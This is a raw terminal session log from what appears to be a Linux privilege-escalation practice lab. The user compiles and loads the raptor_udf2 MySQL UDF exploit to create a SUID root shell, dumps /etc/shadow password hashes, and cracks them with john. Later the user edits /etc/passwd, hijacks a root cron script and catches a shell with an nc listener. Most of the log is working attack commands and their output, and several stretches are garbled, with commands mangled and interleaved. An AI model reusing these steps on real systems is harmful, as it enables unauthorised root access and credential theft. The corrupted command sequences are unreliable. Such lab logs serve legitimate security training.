168 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0xfdf1), seq 26747530:26810173, ack 11104, win 482, options [nop,nop,TS val 997088044 ecr 3431984562], length 62643: HTTP
16900:43:01.861149 IP (tos 0x0, ttl 64, id 24567, offset 0, flags [DF], proto TCP (6), length 2896)
170 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xe4c3), seq 26810173:26813017, ack 11104, win 482, options [nop,nop,TS val 997088044 ecr 3431984562], length 2844: HTTP
17100:43:01.861301 IP (tos 0x0, ttl 64, id 24678, offset 0, flags [DF], proto TCP (6), length 52)
172 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x9dad (correct), seq 11104, ack 26801224, win 6071, options [nop,nop,TS val 3431984584 ecr 997088044], length 0
17300:43:01.861365 IP (tos 0x0, ttl 64, id 24679, offset 0, flags [DF], proto TCP (6), length 52)
174 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x6fe0 (correct), seq 11104, ack 26813017, win 6003, options [nop,nop,TS val 3431984584 ecr 997088044], length 0
17500:43:01.862496 IP (tos 0x0, ttl 64, id 24568, offset 0, flags [DF], proto TCP (6), length 57210)
176 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x8a56 (incorrect -> 0x8614), seq 26813017:26870175, ack 11104, win 482, options [nop,nop,TS val 997088046 ecr 3431984584], length 57158: HTTP
177^Cssh user@10.10.170.166
183Owner@DESKTOP-8DUSIOO ~
184$ ssh user@10.10.170.166
185ssh: connect to host 10.10.170.166 port 22: Connection timed out
186
187Owner@DESKTOP-8DUSIOO ~
188$ ssh 10.10.170.166
189The authenticity of host '10.10.170.166 (10.10.170.166)' can't be esta
190blished.
191RSA key fingerprint is SHA256:JwwPVfqC+8LPQda0B9wFLZzXCXcoAho6s8wYGjkt
192Ank.
193Are you sure you want to continue connecting (yes/no)? yes
194Warning: Permanently added '10.10.170.166' (RSA) to the list of known
195Owner@DESKTOP-8DUSIOO ~
196$ ssh 10.10.170.166
197The authenticity of host '10.10.170.166 (10.10.170.166)' can't be established.
198RSA key fingerprint is SHA256:JwwPVfqC+8LPQda0B9wFLZzXCXcoAho6s8wYGjktAnk.
199Are you sure you want to continue connecting (yes/no)? yes
200Warning: Permanently added '10.10.170.166' (RSA) to the list of known hosts.
201owner@10.10.170.166's password:
202Permission denied, please try again.
203owner@10.10.170.166's password:
204Permission denied, please try again.
205owner@10.10.170.166's password:
206$ ssh 10.10.170.1666K0s
207Owner@DESKTOP-8DUSIOO ~ostname 10.10.170.166:22: No such host is known
208$ ssh 10.10.170.1666K0ssh: Could not resolve hostn
209ame 10.10.170.166:22: No such host is known.
210Owner@DESKTOP-8DUSIOO ~
211Owner@DESKTOP-8DUSIOO ~6 22
212$ 6 22
213ser@10user@10.10.170.166's passwor
214d:
215bash: 22: command not found
216Owner@DESKTOP-8DUSIOO ~
217Owner@DESKTOP-8DUSIOO ~6 22
218$ 6 220.10.170.1
21966's puser@10.10.170.166's password:
220owner@10.10.170.166's password:
221user@10.10.170.166's password:
222Owner@DESKTOP-8DUSIOO ~ound
223$ ssh 10.10.Ku
224Owner@DESKTOP- ~
225Owner@DESKTOP-8DUSIOO ~
226$ ssh user@10.10.170.166 22
227user@10.10.170.166's password:
228bash: 22: command not found
229bash: 22: command not found
230Owner@DESKTOP-8DUSIOO ~
231$ ssh user@10.10.170.166
232$ 6 22 [-E log_file] user@10.10.170.166's configfile] [-I pkcs11]
233password:
234Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64
235
236The programs included with the Debian GNU/Linux system are free software;
237the exact distribution terms for each program are described in the
238individual files in /usr/share/doc/*/copyright.
239
240Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
241permitted by applicable law.
242Last login: Fri May 15 06:41:23 2020 from 192.168.1.125
243user@debian:~$ id
244uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plug
245dev)
246user@debian:~$ ls
247myvpn.ovpn tools
248user@debian:~$ cd tools/
249user@debian:~/tools$ ls
250kernel-exploits mysql-udf nginx privesc-scripts sudo suid
251user@debian:~/tools$ cd mysql-udf/
252user@debian:~/tools/mysql-udf$ ls
253raptor_udf2.c
254user@debian:~/tools/mysql-udf$ gcc -g -c raptor_udf2.c -fPIC
255user@debian:~/tools/mysql-udf$ gcc -g -shared -W1, -soname, raptor_udf2.so -o raptor_udf2.so raptor_udf2
256.o -lc
257top - 20:04:48 up 11 min, 1 user, load average: 0.00, 0.07, 0.08
258Tasks: 83 total, 1 running, 82 sleeping, 0 stopped, 0 zombie
259Cpu(s): 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
260Mem: 507168k total, 498240k used, 8928k free, 382220k buffers
261Swap: 901112k total, 0k used, 901112k free, 54236k cached
262
263 PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
264 1 root 20 0 8396 812 680 S 0.0 0.2 0:01.06 init
265 2 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kthreadd
266 3 root RT 0 0 0 0 S 0.0 0.0 0:00.00 migration/0
267 4 root 20 0 0 0 0 S 0.0 0.0 0:00.00 ksoftirqd/0
268 5 root RT 0 0 0 0 S 0.0 0.0 0:00.00 watchdog/0
269 6 root 20 0 0 0 0 S 0.0 0.0 0:00.01 events/0
270 7 root 20 0 0 0 0 S 0.0 0.0 0:00.00 cpuset
271 8 root 20 0 0 0 0 S 0.0 0.0 0:00.00 khelper
272 9 root 20 0 0 0 0 S 0.0 0.0 0:00.00 netns
273 10 root 20 0 0 0 0 S 0.0 0.0 0:00.00 async/mgr
274 11 root 20 0 0 0 0 S 0.0 0.0 0:00.00 pm
275 12 root 20 0 0 0 0 S 0.0 0.0 0:00.00 xenwatch
276 13 root 20 0 0 0 0 S 0.0 0.0 0:00.00 xenbus
277 14 root 20 0 0 0 0 S 0.0 0.0 0:00.00 sync_supers
278 15 root 20 0 0 0 0 S 0.0 0.0 0:00.00 bdi-default
279 16 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kintegrityd/0
280 17 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kblockd/0
281 18 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kacpid
282 19 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kacpi_notify
283 20 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kacpi_hotplug
284 21 root 20 0 0 0 0 S 0.0 0.0 0:00.06 kseriod
285 23 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kondemand/0
286 24 root 20 0 0 0 0 S 0.0 0.0 0:00.00 khungtaskd
287 25 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kswapd0
288 26 root 25 5 0 0 0 S 0.0 0.0 0:00.00 ksmd
289 27 root 20 0 0 0 0 S 0.0 0.0 0:00.00 aio/0
290 28 root 20 0 0 0 0 S 0.0 0.0 0:00.00 crypto/0
291 165 root 20 0 0 0 0 S 0.0 0.0 0:00.00 ata/0
292 166 root 20 0 0 0 0 S 0.0 0.0 0:00.00 ata_aux
293 167 root 20 0 0 0 0 S 0.0 0.0 0:00.00 scsi_eh_0
294 168 root 20 0 0 0 0 S 0.0 0.0 0:00.01 scsi_eh_1
295 198 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kjournald
296 240 root 20 0 0 0 0 S 0.0 0.0 0:00.00 flush-202:0
297 275 root 16 -4 16784 796 380 S 0.0 0.2 0:00.34 udevd
298 425 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kpsmoused
299 932 root 18 -2 16780 720 308 S 0.0 0.1 0:00.00 udevd
300 933 root 18 -2 16780 648 236 S 0.0 0.1 0:00.00 udevd
301 1249 root 20 0 6796 756 284 S 0.0 0.1 0:00.03 dhclient
302 1279 daemon 20 0 8136 532 408 S 0.0 0.1 0:00.00 portmap
303 1311 statd 20 0 14424 896 732 S 0.0 0.2 0:00.00 rpc.statd
304 1314 root 20 0 0 0 0 S 0.0 0.0 0:00.00 rpciod/0
305 1316 root 15 -5 0 0 0 S 0.0 0.0 0:00.00 kslowd000
306 1317 root 15 -5 0 0 0 S 0.0 0.0 0:00.00 kslowd001
307 1318 root 20 0 0 0 0 S 0.0 0.0 0:00.00 nfsiod
308 1325 root 20 0 27064 588 372 S 0.0 0.1 0:00.00 rpc.idmapd
309 1562 root 20 0 54336 1656 1084 S 0.0 0.3 0:00.08 rsyslogd
310 1638 root 20 0 3960 644 504 S 0.0 0.1 0:00.00 acpid
311 1672 root 20 0 71424 2896 1476 S 0.0 0.6 0:00.01 apache2
312 1675 www-data 20 0 71156 1992 596 S 0.0 0.4 0:00.00 apache2
313 1676 www-data 20 0 287m 2628 984 S 0.0 0.5 0:00.00 apache2
314 1677 www-data 20 0 287m 2644 996 S 0.0 0.5 0:00.00 apache2
315 1818 root 20 0 22468 1068 824 S 0.0 0.2 0:00.00 cron
316user@debian:~/tools/mysql-udf$ use mysql;
317-bash: use: command not found
318user@debian:~/tools/mysql-udf$ mysql -u root
319Welcome to the MySQL monitor. Commands end with ; or \g.
320Your MySQL connection id is 36
321Server version: 5.1.73-1+deb6u1 (Debian)
322
323Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
324
325Oracle is a registered trademark of Oracle Corporation and/or its
326affiliates. Other names may be trademarks of their respective
327owners.
328
329Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
330
331mysql> use mysql;
332Reading table information for completion of table and column names
333You can turn off this feature to get a quicker startup with -A
334
335Database changed
336mysql> create table foo(line blob);
337Query OK, 0 rows affected (0.00 sec)
338
339mysql> insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));
340Query OK, 1 row affected (0.00 sec)
341
342mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
343Query OK, 1 row affected (0.00 sec)
344
345mysql> create function do_system returns integer soname 'raptor_udf2.so';
346Query OK, 0 rows affected (0.00 sec)
347
348mysql> select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
349+------------------------------------------------------------------+
350| do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash') |
351+------------------------------------------------------------------+
352| 0 |
353+------------------------------------------------------------------+
3541 row in set (0.00 sec)
355
356mysql> /q
357 -> exit
358 -> /quit
359 -> ^CCtrl-C -- exit!
360Aborted
361user@debian:~/tools/mysql-udf$ /tmp/rootbash -p
362rootbash-4.1# id
363uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30
364(dip),44(video),46(plugdev),1000(user)
365rootbash-4.1# cat /etc/shadow
366root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:
36717298:0:99999:7:::
368daemon:*:17298:0:99999:7:::
369bin:*:17298:0:99999:7:::
370sys:*:17298:0:99999:7:::
371sync:*:17298:0:99999:7:::
372games:*:17298:0:99999:7:::
373man:*:17298:0:99999:7:::
374lp:*:17298:0:99999:7:::
375mail:*:17298:0:99999:7:::
376news:*:17298:0:99999:7:::
377uucp:*:17298:0:99999:7:::
378proxy:*:17298:0:99999:7:::
379www-data:*:17298:0:99999:7:::
380backup:*:17298:0:99999:7:::
381list:*:17298:0:99999:7:::
382irc:*:17298:0:99999:7:::
383gnats:*:17298:0:99999:7:::
384nobody:*:17298:0:99999:7:::
385libuuid:!:17298:0:99999:7:::
386Debian-exim:!:17298:0:99999:7:::
387sshd:*:17298:0:99999:7:::
388user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjwYpT2O1zrR2xTROv7wRIkF8.:
38917298:0:99999:7:::
390statd:*:17299:0:99999:7:::
391mysql:!:18133:0:99999:7:::
392rootbash-4.1# cat /etc/passwd
393root:x:0:0:root:/root:/bin/bash
394daemon:x:1:1:daemon:/usr/sbin:/bin/sh
395bin:x:2:2:bin:/bin:/bin/sh
396sys:x:3:3:sys:/dev:/bin/sh
397sync:x:4:65534:sync:/bin:/bin/sync
398games:x:5:60:games:/usr/games:/bin/sh
399man:x:6:12:man:/var/cache/man:/bin/sh
400lp:x:7:7:lp:/var/spool/lpd:/bin/sh
401mail:x:8:8:mail:/var/mail:/bin/sh
402news:x:9:9:news:/var/spool/news:/bin/sh
403uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
404proxy:x:13:13:proxy:/bin:/bin/sh
405www-data:x:33:33:www-data:/var/www:/bin/sh
406backup:x:34:34:backup:/var/backups:/bin/sh
407list:x:38:38:Mailing List Manager:/var/list:/bin/sh
408irc:x:39:39:ircd:/var/run/ircd:/bin/sh
409gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
410nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
411libuuid:x:100:101::/var/lib/libuuid:/bin/sh
412Debian-exim:x:101:103::/var/spool/exim4:/bin/false
413sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
414user:x:1000:1000:user,,,:/home/user:/bin/bash
415statd:x:103:65534::/var/lib/nfs:/bin/false
416mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
417rootbash-4.1# cat /etc/hosts
418127.0.0.1 localhost
419127.0.1.1 debian.localdomain debian
420
421# The following lines are desirable for IPv6 capable hosts
422::1 ip6-localhost ip6-loopback
423fe00::0 ip6-localnet
424ff00::0 ip6-mcastprefix
425ff02::1 ip6-allnodes
426ff02::2 ip6-allrouters
427rootbash-4.1# ls -l /etc/shadow
428-rw-r--rw- 1 root shadow 837 Aug 25 2019 /etc/shadow
429rootbash-4.1# cat /etc/shadow
430root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:
43117298:0:99999:7:::
432daemon:*:17298:0:99999:7:::
433bin:*:17298:0:99999:7:::
434sys:*:17298:0:99999:7:::
435sync:*:17298:0:99999:7:::
436games:*:17298:0:99999:7:::
437man:*:17298:0:99999:7:::
438lp:*:17298:0:99999:7:::
439mail:*:17298:0:99999:7:::
440news:*:17298:0:99999:7:::
441uucp:*:17298:0:99999:7:::
442proxy:*:17298:0:99999:7:::
443www-data:*:17298:0:99999:7:::
444backup:*:17298:0:99999:7:::
445list:*:17298:0:99999:7:::
446irc:*:17298:0:99999:7:::
447gnats:*:17298:0:99999:7:::
448nobody:*:17298:0:99999:7:::
449libuuid:!:17298:0:99999:7:::
450Debian-exim:!:17298:0:99999:7:::
451sshd:*:17298:0:99999:7:::
452user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjwYpT2O1zrR2xTROv7wRIkF8.:
45317298:0:99999:7:::
454statd:*:17299:0:99999:7:::
455mysql:!:18133:0:99999:7:::
456rootbash-4.1# wget
457wget: missing URL
458Usage: wget [OPTION]... [URL]...
459
460Try ‘wget --help’ for more options.
461rootbash-4.1# pwd
462/home/user/tools/mysql-udf
463rootbash-4.1# ls
464raptor_udf2.c raptor_udf2.o raptor_udf2.so
465rootbash-4.1# cd ..
466rootbash-4.1# ls
467kernel-exploits mysql-udf nginx privesc-scripts sudo suid
468rootbash-4.1# cd ..
469rootbash-4.1# ls
470myvpn.ovpn tools
471rootbash-4.1# cd tools/
472rootbash-4.1# ls
473kernel-exploits mysql-udf nginx privesc-scripts sudo suid
474rootbash-4.1# cd privesc-scripts/
475rootbash-4.1# ls
476LinEnum.sh linpeas.sh lse.sh
477rootbash-4.1# john --wordlist =/usr/share/wordlists/rockyou.txt hash.txt
478login as: user
479user@10.10.170.166's password:
480Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64
481
482The programs included with the Debian GNU/Linux system are free software;
483the exact distribution terms for each program are described in the
484individual files in /usr/share/doc/*/copyright.
485
486Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
487permitted by applicable law.
488Last login: Sun Jan 17 21:12:02 2021 from ip-10-9-252-16.eu-west-1.compute.internal
489user@debian:~$ cd /home/user/tools/mysql.udf
490-bash: cd: /home/user/tools/mysql.udf: No such file or directory
491user@debian:~$ ls
492myvpn.ovpn tools
493user@debian:~$ cd tools/
494user@debian:~/tools$ ls
495kernel-exploits mysql-udf nginx privesc-scripts sudo suid
496user@debian:~/tools$ gcc -g -c raptor_udf2.c -fPIC
497gcc: raptor_udf2.c: No such file or directory
498gcc: no input files
499user@debian:~/tools$ cd mysql-udf/
500user@debian:~/tools/mysql-udf$ gcc -g -c raptor_udf2.c -fPIC
501user@debian:~/tools/mysql-udf$ gcc -g -shared -W1, -soname, raptor_udf2.so -o re aptor_udf2.so raptor_udf2.o -1c
502gcc: unrecognized option '-soname,'
503gcc: unrecognized option '-1c'
504user@debian:~/tools/mysql-udf$ gcc -g -shared -W1, -soname, raptor_udf2.so -o re aptor_udf2.so raptor_udf2.o -lc
505gcc: unrecognized option '-soname,'
506user@debian:~/tools/mysql-udf$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o rapt or_udf2.so raptor_udf2.o -lc
507user@debian:~/tools/mysql-udf$ mysql -u root
508Welcome to the MySQL monitor. Commands end with ; or \g.
509Your MySQL connection id is 37
510Server version: 5.1.73-1+deb6u1 (Debian)
511
512Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
513
514Oracle is a registered trademark of Oracle Corporation and/or its
515affiliates. Other names may be trademarks of their respective
516owners.
517
518Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
519
520mysql> use mysql;
521Reading table information for completion of table and column names
522You can turn off this feature to get a quicker startup with -A
523
524Database changed
525mysql> create table bmillakid(line blob);
526Query OK, 0 rows affected (0.00 sec)
527
528mysql> insert into bmillakid values(load_file('home/usr/tools/mysql-udf/raptor_u df2.so' ));
529Query OK, 1 row affected (0.00 sec)
530
531mysql> select * from bmillakid into dumpfile '/usr/lib/mysql/plugin/raptor_udf2. so';
532ERROR 1086 (HY000): File '/usr/lib/mysql/plugin/raptor_udf2.so' already exists
533mysql> exit
534Bye
535user@debian:~/tools/mysql-udf$ who am i
536user pts/0 2021-01-17 21:14 (ip-10-9-252-16.eu-west-1.compute.internal)
537user@debian:~/tools/mysql-udf$ links
538-bash: links: command not found
539user@debian:~/tools/mysql-udf$ lynx
540-bash: lynx: command not found
541user@debian:~/tools/mysql-udf$ wget
542wget: missing URL
543Usage: wget [OPTION]... [URL]...
544
545Try ‘wget --help’ for more options.
546user@debian:~/tools/mysql-udf$ cat /etc/shadow
547root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8 r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::
548daemon:*:17298:0:99999:7:::
549bin:*:17298:0:99999:7:::
550sys:*:17298:0:99999:7:::
551sync:*:17298:0:99999:7:::
552games:*:17298:0:99999:7:::
553man:*:17298:0:99999:7:::
554lp:*:17298:0:99999:7:::
555mail:*:17298:0:99999:7:::
556news:*:17298:0:99999:7:::
557uucp:*:17298:0:99999:7:::
558proxy:*:17298:0:99999:7:::
559www-data:*:17298:0:99999:7:::
560backup:*:17298:0:99999:7:::
561list:*:17298:0:99999:7:::
562irc:*:17298:0:99999:7:::
563gnats:*:17298:0:99999:7:::
564nobody:*:17298:0:99999:7:::
565libuuid:!:17298:0:99999:7:::
566Debian-exim:!:17298:0:99999:7:::
567sshd:*:17298:0:99999:7:::
568user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjw YpT2O1zrR2xTROv7wRIkF8.:17298:0:99999:7:::
569statd:*:17299:0:99999:7:::
570mysql:!:18133:0:99999:7:::
571bmillakid:!:18645:0:99999:7:::
572user@debian:~/tools/mysql-udf$ cat /etc/passwd
573root:x:0:0:root:/root:/bin/bash
574daemon:x:1:1:daemon:/usr/sbin:/bin/sh
575bin:x:2:2:bin:/bin:/bin/sh
576sys:x:3:3:sys:/dev:/bin/sh
577sync:x:4:65534:sync:/bin:/bin/sync
578games:x:5:60:games:/usr/games:/bin/sh
579man:x:6:12:man:/var/cache/man:/bin/sh
580lp:x:7:7:lp:/var/spool/lpd:/bin/sh
581mail:x:8:8:mail:/var/mail:/bin/sh
582news:x:9:9:news:/var/spool/news:/bin/sh
583uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
584proxy:x:13:13:proxy:/bin:/bin/sh
585www-data:x:33:33:www-data:/var/www:/bin/sh
586backup:x:34:34:backup:/var/backups:/bin/sh
587list:x:38:38:Mailing List Manager:/var/list:/bin/sh
588irc:x:39:39:ircd:/var/run/ircd:/bin/sh
589gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
590nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
591libuuid:x:100:101::/var/lib/libuuid:/bin/sh
592Debian-exim:x:101:103::/var/spool/exim4:/bin/false
593sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
594user:x:1000:1000:user,,,:/home/user:/bin/bash
595statd:x:103:65534::/var/lib/nfs:/bin/false
596mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
597bmillakid:x:1001:1001::/home/bmillakid:/bin/sh
598user@debian:~/tools/mysql-udf$ ls -la user
599ls: cannot access user: No such file or directory
600user@debian:~/tools/mysql-udf$ pwd
601/home/user/tools/mysql-udf
602user@debian:~/tools/mysql-udf$ who am i
603user pts/0 2021-01-17 21:14 (ip-10-9-252-16.eu-west-1.compute.internal)
604user@debian:~/tools/mysql-udf$ whoami
605user
606user@debian:~/tools/mysql-udf$ ls -la /
607total 96
608drwxr-xr-x 22 root root 4096 Aug 25 2019 .
609drwxr-xr-x 22 root root 4096 Aug 25 2019 ..
610drwxr-xr-x 2 root root 4096 Aug 25 2019 bin
611drwxr-xr-x 3 root root 4096 May 12 2017 boot
612drwxr-xr-x 12 root root 2820 Jan 17 19:55 dev
613drwxr-xr-x 67 root root 4096 Jan 17 21:16 etc
614drwxr-xr-x 3 root root 4096 May 15 2017 home
615lrwxrwxrwx 1 root root 30 May 12 2017 initrd.img -> boot/initrd.img-2.6.32-5-amd64
616drwxr-xr-x 12 root root 12288 May 14 2017 lib
617lrwxrwxrwx 1 root root 4 May 12 2017 lib64 -> /lib
618drwx------ 2 root root 16384 May 12 2017 lost+found
619drwxr-xr-x 3 root root 4096 May 12 2017 media
620drwxr-xr-x 2 root root 4096 Jun 11 2014 mnt
621drwxr-xr-x 2 root root 4096 May 12 2017 opt
622dr-xr-xr-x 96 root root 0 Jan 17 19:53 proc
623drwx------ 5 root root 4096 May 15 2020 root
624drwxr-xr-x 2 root root 4096 May 13 2017 sbin
625drwxr-xr-x 2 root root 4096 Jul 21 2010 selinux
626drwxr-xr-x 2 root root 4096 May 12 2017 srv
627drwxr-xr-x 2 root root 4096 Aug 25 2019 .ssh
628drwxr-xr-x 13 root root 0 Jan 17 19:53 sys
629drwxrwxrwt 2 root root 4096 Jan 17 21:19 tmp
630drwxr-xr-x 11 root root 4096 May 13 2017 usr
631drwxr-xr-x 14 root root 4096 May 13 2017 var
632lrwxrwxrwx 1 root root 27 May 12 2017 vmlinuz -> boot/vmlinuz-2.6.32-5-amd64
633user@debian:~/tools/mysql-udf$ whoami
634user
635user@debian:~/tools/mysql-udf$ sudo -l
636Matching Defaults entries for user on this host:
637 env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH
638
639User user may run the following commands on this host:
640 (root) NOPASSWD: /usr/sbin/iftop
641 (root) NOPASSWD: /usr/bin/find
642 (root) NOPASSWD: /usr/bin/nano
643 (root) NOPASSWD: /usr/bin/vim
644 (root) NOPASSWD: /usr/bin/man
645 (root) NOPASSWD: /usr/bin/awk
646 (root) NOPASSWD: /usr/bin/less
647 (root) NOPASSWD: /usr/bin/ftp
648 (root) NOPASSWD: /usr/bin/nmap
649 (root) NOPASSWD: /usr/sbin/apache2
650 (root) NOPASSWD: /bin/more
651user@debian:~/tools/mysql-udf$ cat /etc/shadow | grep root
652root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8 r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::
653user@debian:~/tools/mysql-udf$ ls -l /etc/passwd
654-rw-r--r-- 1 root root 1056 Jan 17 20:33 /etc/passwd
655user@debian:~/tools/mysql-udf$ openssl passwd l33th4x0rbr0!
656Warning: truncating password to 8 characters
6575v3Bvw7Nf6Zbs
658user@debian:~/tools/mysql-udf$
659user@debian:~/tools/mysql-udf$ 5v3Bvw7Nf6Zbs
660-bash: 5v3Bvw7Nf6Zbs: command not found
661user@debian:~/tools/mysql-udf$ nano /etc/passwd
662user@debian:~/tools/mysql-udf$ /tmp/rootbash -p
663rootbash-4.1# su newroot
664Unknown id: newroot
665rootbash-4.1# whoami
666root
667rootbash-4.1# cat /etc/passwd
668root:x:0:0:root:/root:/bin/bash
669daemon:x:1:1:daemon:/usr/sbin:/bin/sh
670bin:x:2:2:bin:/bin:/bin/sh
671sys:x:3:3:sys:/dev:/bin/sh
672sync:x:4:65534:sync:/bin:/bin/sync
673games:x:5:60:games:/usr/games:/bin/sh
674man:x:6:12:man:/var/cache/man:/bin/sh
675lp:x:7:7:lp:/var/spool/lpd:/bin/sh
676mail:x:8:8:mail:/var/mail:/bin/sh
677news:x:9:9:news:/var/spool/news:/bin/sh
678uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
679proxy:x:13:13:proxy:/bin:/bin/sh
680www-data:x:33:33:www-data:/var/www:/bin/sh
681backup:x:34:34:backup:/var/backups:/bin/sh
682list:x:38:38:Mailing List Manager:/var/list:/bin/sh
683irc:x:39:39:ircd:/var/run/ircd:/bin/sh
684gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
685nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
686libuuid:x:100:101::/var/lib/libuuid:/bin/sh
687Debian-exim:x:101:103::/var/spool/exim4:/bin/false
688sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
689user:x:1000:1000:user,,,:/home/user:/bin/bash
690statd:x:103:65534::/var/lib/nfs:/bin/false
691mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
692bmillakid:x:1001:1001::/home/bmillakid:/bin/sh
693rootbash-4.1# su root
694Password:
695su: Authentication failure
696rootbash-4.1# exit
697exit
698user@debian:~/tools/mysql-udf$ sudo -l
699Matching Defaults entries for user on this host:
700 env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH
701
702User user may run the following commands on this host:
703 (root) NOPASSWD: /usr/sbin/iftop
704 (root) NOPASSWD: /usr/bin/find
705 (root) NOPASSWD: /usr/bin/nano
706 (root) NOPASSWD: /usr/bin/vim
707 (root) NOPASSWD: /usr/bin/man
708 (root) NOPASSWD: /usr/bin/awk
709 (root) NOPASSWD: /usr/bin/less
710 (root) NOPASSWD: /usr/bin/ftp
711 (root) NOPASSWD: /usr/bin/nmap
712 (root) NOPASSWD: /usr/sbin/apache2
713 (root) NOPASSWD: /bin/more
714user@debian:~/tools/mysql-udf$ cat /etc/crontab
715# /etc/crontab: system-wide crontab
716# Unlike any other crontab you don't have to run the `crontab'
717# command to install the new version when you edit this file
718# and files in /etc/cron.d. These files also have username fields,
719# that none of the other crontabs do.
720
721SHELL=/bin/sh
722PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
723
724# m h dom mon dow user command
72517 * * * * root cd / && run-parts --report /etc/cron.hourly
72625 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
72747 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
72852 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
729#
730* * * * * root overwrite.sh
731* * * * * root /usr/local/bin/compress.sh
732
733user@debian:~/tools/mysql-udf$ locate overwrite.sh
734locate: warning: database `/var/cache/locate/locatedb' is more than 8 days old (actual age is 247.7 days)
735/usr/local/bin/overwrite.sh
736user@debian:~/tools/mysql-udf$ ls -l /usr/local/bin/overwrite.sh
737-rwxr--rw- 1 root staff 40 May 13 2017 /usr/local/bin/overwrite.sh
738user@debian:~/tools/mysql-udf$ cd /usr/local/bin/
739user@debian:/usr/local/bin$ ls
740compress.sh overwrite.sh suid-env suid-env2 suid-so
741user@debian:/usr/local/bin$ cat overwrite.sh
742#!/bin/bash
743
744echo `date` > /tmp/useless
745user@debian:/usr/local/bin$ nano overwrite.sh
746user@debian:/usr/local/bin$ nc -nvlp 4444
747listening on [any] 4444 ...
748connect to [10.10.170.166] from (UNKNOWN) [10.10.170.166] 37728
749allexport off
750braceexpand on
751emacs on
752errexit off
753errtrace off
754functrace off
755hashall on
756histexpand on
757history on
758ignoreeof off
759interactive-comments on
760keyword off
761monitor off
762noclobber off
763noexec off
764noglob off
765nolog off
766notify off
